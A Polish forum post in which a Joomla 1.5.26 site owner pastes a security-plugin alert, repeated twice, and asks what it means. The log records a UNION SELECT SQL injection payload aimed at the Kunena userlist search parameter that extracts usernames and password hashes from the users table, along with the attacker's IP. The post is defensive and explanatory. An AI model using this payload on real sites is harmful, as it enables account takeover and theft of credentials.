zaba600
17-11-2012, 17:51
witam
joomla 1.5.26 , od jakiegos czasu ktos sie proboje dostac do strony , mam taki komnikat , prosze o interpretacje:
** Union Select [GET:search] => %\' and 1=2) union select 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from #__users-- ;
** Table name in url [GET:search] => %\' and 1=2) -- 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from #__users-- ;
** Union Select [REQUEST:search] => %\' and 1=2) union select 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from #__users-- ;
** Table name in url [REQUEST:search] => %\' and 1=2) -- 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from #__users-- ;
**PAGE / SERVER INFO
*REMOTE_ADDR :
202.75.56.212
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_kunena&func=userlist&search=%25'%20and%201=2)%20union%20select%201,conc at(0x7 e,username,0x3a,password,0x3a,usertype,0x7e),3,4,5 ,6,7,8,9,10,11,12,13,14,15%20from%20%23__users--%2 0;
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %\' and 1=2) -- 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %\' and 1=2) -- 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;
joomla 1.5.26 , od jakiegos czasu ktos sie proboje dostac do strony , mam taki komnikat , prosze o interpretacje:
** Union Select [GET:search] => %\' and 1=2) union select 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from #__users-- ;
** Table name in url [GET:search] => %\' and 1=2) -- 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from #__users-- ;
** Union Select [REQUEST:search] => %\' and 1=2) union select 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from #__users-- ;
** Table name in url [REQUEST:search] => %\' and 1=2) -- 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from #__users-- ;
**PAGE / SERVER INFO
*REMOTE_ADDR :
202.75.56.212
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_kunena&func=userlist&search=%25'%20and%201=2)%20union%20select%201,conc at(0x7 e,username,0x3a,password,0x3a,usertype,0x7e),3,4,5 ,6,7,8,9,10,11,12,13,14,15%20from%20%23__users--%2 0;
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %\' and 1=2) -- 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %\' and 1=2) -- 1,concat(0x7e,username,0x3a,password,0x3a,usertype ,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;